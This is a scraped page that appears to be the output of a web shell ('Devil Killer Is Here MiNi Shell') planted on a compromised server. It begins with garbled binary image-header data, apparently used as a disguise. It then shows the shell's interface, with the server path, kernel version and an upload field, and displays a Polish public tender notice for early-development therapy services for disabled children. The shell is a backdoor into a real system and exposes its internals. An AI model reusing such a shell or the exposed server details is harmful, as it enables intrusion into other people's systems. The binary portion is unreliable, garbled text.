JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231218/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231218/0055833201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usług związanych z organizacją i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach programu kompleksowego wsparcia dla rodzin „Za życiem” w roku 2024”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Specjalny Ośrodek szkolno-Wychowawczy w Dobrej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000195541</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dobra</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-642</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">183330029</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">183330029</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">soswdobra.dyr@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://sosw-dobra.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Powiat Limanowski</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892854</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Józefa Marka 9</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Limanowa</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">34-600</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">183337800</span></h3> <h3 class="mb-0">1.11.10.) Numer faksu: <span class="normal">183337880</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiat.limanowski.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.powiat.limanowski.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usług związanych z organizacją i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach programu kompleksowego wsparcia dla rodzin „Za życiem” w roku 2024”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8d1c2f41-9d90-11ee-948d-82b0c04ef850</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00558332</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00200420/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 „Świadczenie usług związanych z organizacją i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach programu kompleksowego wsparcia dla rodzin „Za życiem” w roku 2024”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja między Zamawiającym, a Wykonawcą, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy on-line działającej pod adresem https://e-propublico.pl, zwanej dalej jako: „Platforma”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy określone w Regulaminie oraz uznaje go za wiążący.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie.<br/>3. Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu<br/>elektronicznego, podpisu zaufanego lub podpisu osobistego.<br/>4. Ilekroć w SWZ jest mowa o: a) podpisie zaufanym – należy<br/>przez to rozumieć podpis, o którym mowa art. 3 pkt 14a ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne ; b) podpisie osobistym – należy przez to rozumieć podpis, o którym mowa w art. 2 ust. 1 pkt 9 ustawy z 6 sierpnia 2010 r. o dowodach osobistych.<br/>5. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego: a) dokumenty sporządzone i przesyłane w formacie .pdf zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie PAdES; b) dokumenty sporządzone i przesyłane w formacie innym niż .pdf zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie XAdES; c) do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub wyższego), d) w przypadku podpisywanie pliku przez kilka osób, zalecamy stosować podpisy tego<br/>samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików;<br/>e) w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie w szczególności jednego z formatów: .zip, .7z.<br/>6. Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy: a) stały dostęp do sieci Internet; b) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail), c) komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux, d) zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, MozillaFirefox, Google Chrome, Opera), e) włączona obsługa JavaScript oraz Cookies. <br/>7. Zamawiający dopuszcza pliki o wielkości do 80 MB w szczególności w formatach: .pdf, .doc, .docx., .rtf, .odt. Zamawiający nie określa limitu liczby plików. <br/>8. Formaty plików wykorzystywanych przez Wykonawców muszą być zgodne z rozporządzeniem Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. <br/>9.Zamawiający określa następujące informacje na temat kodowania i czasu odbioru danych: a)załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie jest dostępny dla Zamawiającego i przechowywany jest na serwerach Platformy w formie zaszyfrowanej. Zamawiający otrzyma dostęp do pliku dopiero po upływie terminu otwarcia ofert; b)oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w kolumnie „Data przesłania”; c)o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.<br/>10. W postępowaniu, wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są za pośrednictwem Platformy (karta: „Zapytania/Wyjaśnienia”, „Wiadomości”, „Dokumenty na wezwanie”). Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przesłanych za pośrednictwem Platformy, przyjmuje się datę ich zamieszczenia na Platformie. <br/>11. Ofertę wraz ze stanowiącymi jej integralną część załącznikami, składa się pod rygorem nieważności w formie elektronicznej lub postaci elektronicznej za pośrednictwem Platformy, podpisaną kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 i 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO”, informuję, że:<br/>a) dane osobowe przetwarzane w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego współadministrowane będą przez: Specjalny Ośrodek Szkolno – Wychowawczy im. Marii Konopnickiej w Dobrej, (SOSW/ Zamawiający) z siedzibą w Dobrej, adres: 34 – 642 Dobra 364, tel. 18 3330029, e-mail: soswdobra.dyr@gmail.com oraz Starostwo<br/>Powiatowe (SP) z siedzibą w Limanowej przy ulicy Józefa Marka 9, 34-600 Limanowa, tel. 18 33 37 800, e-mail: starostwo@powiat.limanowski.pl ;<br/>b) osobą do kontaktu w sprawach dotyczących ochrony danych osobowych jest inspektor ochrony danych osobowych, z którym można kontaktować się: SOSW w Dobrej: telefonicznie pod nr 18 3330029, e-mail: soswdobra.iod@gmail.com, SP w Limanowej: telefonicznie pod nr tel. 18 3337835 lub e-mail: iod@powiat.limanowski.pl<br/>c) Pani/Pana dane osobowe przetwarzane będą w celu związanym z prowadzonym postępowaniem o udzielenie zamówienia publicznego oraz zawarciem i realizacją umowy,<br/>d) Pani/Pana dane osobowe mogą zostać ujawnione wykonawcom oraz wszystkim zainteresowanym, z uwzględnieniem ograniczeń wskazanych w przepisach prawa, a także podmiotom przetwarzającym dane na podstawie zawartych z administratorami umów,<br/>e) Pani/Pana dane osobowe będą przechowywane przez okres odpowiedni dla dokumentacji zamówień publicznych, zgodny z rozporządzeniem Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt dla organów powiatu oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych,<br/>f) podanie przez Panią/Pana danych osobowych jest dobrowolne, zakres wymaganych danych wynika z przepisów ustawy Pzp i jest związany z udziałem w postępowaniu o udzielenie zamówienia publicznego oraz zawarciem i realizacją umowy; konsekwencje niepodania wymaganych danych wynikają z ustawy Pzp,<br/>g) Pani/Pana dane osobowe nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji, w tym profilowania;<br/>h) każda osoba, której dane będą przetwarzane posiada prawo:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż przetwarzanie odbywa się zgodnie z art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ograniczenia stosowania przepisów RODO:<br/>a) Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień zwartej umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą;<br/>b) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SOSW-0701-2/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie częściowe nr 1: Prowadzenie zajęć fizjoterapii/rehabilitacji ruchowej. Szacowana ilość godzin 339.<br/>1. Przedmiotem zamówienia jest przeprowadzenie zajęć wczesnego wspomagania rozwoju dziecka i zajęć specjalistycznych dla dzieci z niepełnosprawnościami oraz zagrożonych niepełnosprawnością, w wieku od 0 do chwili rozpoczęcia przez dziecko nauki w szkole, z terenu Powiatu Limanowskiego w ramach zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”, stanowiącego załącznik do uchwały Nr 189 Rady Ministrów z dnia 27 grudnia 2021 r. zmieniającej uchwałę w sprawie programu kompleksowego wsparcia dla rodzin „Za Życiem” (M.P. z 2022 poz. 64), zwanego dalej „Programem”, w zakresie realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4 ustawy z dnia 7 września 1991 r. o systemie oświaty oraz w rozporządzeniu Ministra Edukacji Narodowej z dnia 5 września 2017 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno – rehabilitacyjno – opiekuńczych – zadanie 2.4 Programu: „Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w okresie od 0. Roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie”, na rzez Specjalnego Ośrodka Szkolno – Wychowawczego w Dobrej.<br/>2. Liczba godzin do zrealizowania w każdej z części zamówienia została podana w maksymalnym zakresie. Zamawiający zastrzega możliwość zmniejszenia liczby godzin w ramach każdej części zamówienia w zależności od liczby dzieci skierowanych do programu i zdiagnozowanych u nich potrzeb terapeutycznych. Rozliczenie następuje miesięcznie na podstawie faktycznie zrealizowanych godzin. W odniesieniu do każdej części zamówienia Zamawiający zleci Wykonawcy liczbę godzin zgodnie z zapotrzebowaniem, nie mniej niż 75 % liczby godzin w danej części zamówienia (zaokrąglając w dół do równej liczby godzin). <br/>3. Usługi świadczone będą w formie indywidualnych zajęć z dziećmi w wieku od 0. roku życia do rozpoczęcia nauki w szkole oraz z ich rodzinami.<br/>4. Czas trwania zajęć określa się jako 1 godzinę zegarową, tj. 60 minut. <br/>5. Wykonawca zapewni pomieszczenia/gabinet do prowadzenia zajęć i poniesie koszty związane z ich utrzymaniem, z uwzględnieniem wymogów dotyczących dostępności, o których mowa w pkt 3.11 SWZ. Wykonawca zapewnia sprzęt i pomoce dydaktyczne niezbędne do przeprowadzenia zajęć.<br/>6. Szczegółowy opis przedmiotu zamówienia oraz warunki wykonania zamówienia zawarte są w opisie przedmiotu zamówienia oraz w projektowanych postanowieniach umowy będących załącznikami do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80340000-9 - Usługi edukacji specjalnej</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <p class="mb-0">85142100-7 - Usługi fizjoterapii</p> <p class="mb-0">85312500-4 - Usługi rehabilitacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Punkty przyznawane za podane kryteria będą liczone według następujących wzorów:<br/>1)	Kryterium 1 - Cena (C) – dla wszystkich zadań częściowych<br/>W kryterium „Cena” można uzyskać maksymalnie 60 pkt. Oferta o najniższej cenie otrzyma 60 pkt, pozostałe proporcjonalnie mniej. <br/>Ostatecznie oferta otrzyma w tym kryterium zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikająca z działania: <br/>Liczba punktów = (Cmin/Cof) * 100 * waga, gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert w danym zadaniu,<br/>- Cof - cena podana w ofercie w danym zadaniu.<br/>2)	Kryterium 2 – Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju (D) – dla wszystkich zadań częściowych <br/>W kryterium doświadczenie w pracy z dziećmi w wieku 0 - 7 lat w zakresie wczesnego wspomagania rozwoju (D) oceniane będzie doświadczenie osoby wskazanej przez Wykonawcę w pkt 2 formularza oferty, w pracy z dziećmi w wieku 0 – 7 lat w zakresie wczesnego wspomagania rozwoju. W tym kryterium można otrzymać maksymalnie 40 pkt. Oceniana będzie podana w Formularzu ofert w pkt 2 ilość lat doświadczenia (należy wskazywać zakończony rok pracy z dziećmi), odpowiednio dla zadania częściowego, <br/><br/>Ocena tego kryterium zostanie dokonana na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty zgodnie z poniższą tabelą:<br/>Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju<br/>Od 0 do 1 roku doświadczenia - 5 pkt<br/>Od 2 do 5 lat doświadczenia - 10 pkt<br/>Od 6 do 9 lat doświadczenia - 20 pkt<br/>Od 10 do 13 lat doświadczenia - 30 pkt<br/>Powyżej 14 lat doświadczenia - 40 pkt<br/><br/>Wskazane w Formularzu oferty doświadczenie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Brak wypełnienia, niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie obciąża Wykonawcę i skutkować będzie nie przyznaniem w tym kryterium punktów.<br/>Zamawiający wymaga dla każdej części minimum 1 osobę, która będzie skierowana do realizacji zamówienia w danym zadaniu. Wykonawca wskazuje tę osobę w Formularzu oferty w pkt 2 odpowiednio dla zadania częściowego w ilości zgodnej z wymaganą minimalną liczbą osób. Jeśli Wykonawca wskaże więcej niż 1 osobę do realizacji zamówienia w tym kryterium uzyska punkty wyliczone wg średniej arytmetycznej - punkty przyznane poszczególnym osobom zostaną zsumowane i podzielone przez liczbę wskazanych osób.<br/>Osoba wskazana do realizacji zamówienia (której doświadczenie podlega ocenie w ramach kryterium), będzie także oceniana zgodnie z pkt 6.2 ppkt 4 SWZ i ma obowiązek realizować zamówienie. Zastąpienie tej osoby jest możliwe w okolicznościach o których mowa w § 3 ust. 7 PPU tylko za zgodą Zamawiającego i pod warunkiem że nowa osoba posiada uprawnienia/doświadczenie nie mniejsze niż osoba zastępowana.<br/>W Formularzu oferty, odpowiednio dla zadania częściowego, należy wskazać wszystkie wymagane dane umożliwiające ocenę kryterium. Dane te nie podlegają uzupełnieniu. <br/>2. Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w niniejszej SWZ warunki oraz uzyska łącznie największą liczbę punktów za wszystkie kryteria obliczoną wg wzoru: P = C + D, gdzie P - wynik oceny dla zadań 1 – 5. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością przyznanych punktów. 